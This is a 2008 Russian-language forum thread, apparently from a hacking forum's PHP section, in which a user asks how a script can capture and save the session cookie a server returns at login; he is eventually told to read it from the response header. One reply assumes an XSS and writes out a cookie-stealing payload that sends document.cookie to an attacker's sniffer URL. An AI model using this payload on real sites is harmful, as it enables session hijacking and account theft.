Снова о куке!!! При авторизации сервер ее дает, как сохр...

Discussion in 'PHP' started by rcc0023, 6 Jul 2008.

  1. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    Снова вопрос о куке!
    Есть сервер X, при авторизации он передает куку... так вот, какой скрипт может перехватить переданную им (сервером X) куку??
     
  2. Ильич

    Ильич Banned

    Joined:
    5 Jul 2008
    Messages:
    13
    Likes Received:
    4
    Reputations:
    0
    никакой
     
  3. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    блин все так туманно расписанно- непойму ты XSS нашел а как ей воспользоваться незнаеш? я правильно понял?, ну для начала тебе снифер нужен ну а потом попробуй вставить что то наподобие (script)img=new Image();img.src="адрес твоего снифера"+document.cookie;(/script)
    P.S. единственное замени ) на > ну и обратную скобку на < в словах script
     
  4. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    Да не)))

    Я написал скрипт (назовем его My_script), который передает пост запрос с обязательной кукой, в которой содержится сессия. Эта сессия на 2 часа, далее идет логаут... сессия уже не действительна. Необходимо снова логинится и забивать в скрипт My_script данные куки... я хочу чтобы новую куку брал скрипт...
     
  5. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить
     
  6. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    используй /dev/head/
    в гугле поищи...
    хорошая вещь...
     
  7. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    Мм... -Hormold-, я не профи)) подробней бы ;)
    и у мну нет никса... одни окна... (на домашнем хочу..)
     
  8. Ильич

    Ильич Banned

    Joined:
    5 Jul 2008
    Messages:
    13
    Likes Received:
    4
    Reputations:
    0
    :D :D :D
     
  9. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    Ну так как?? Опять будете до последнего молчать??!?!?
     
  10. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    Ну ответьте.. какой скрипт это может проделать?
     
  11. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Из заголовка ответа возьми, либо cat /dev/legs > /dev/mouth
     
    2 people like this.
  12. rcc0023

    rcc0023 Elder - Старейшина

    Joined:
    3 Jul 2008
    Messages:
    100
    Likes Received:
    6
    Reputations:
    0
    Точно, в заголовке сидела)))
     
  13. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    почитай доки по Http протаколу, сам все поймеш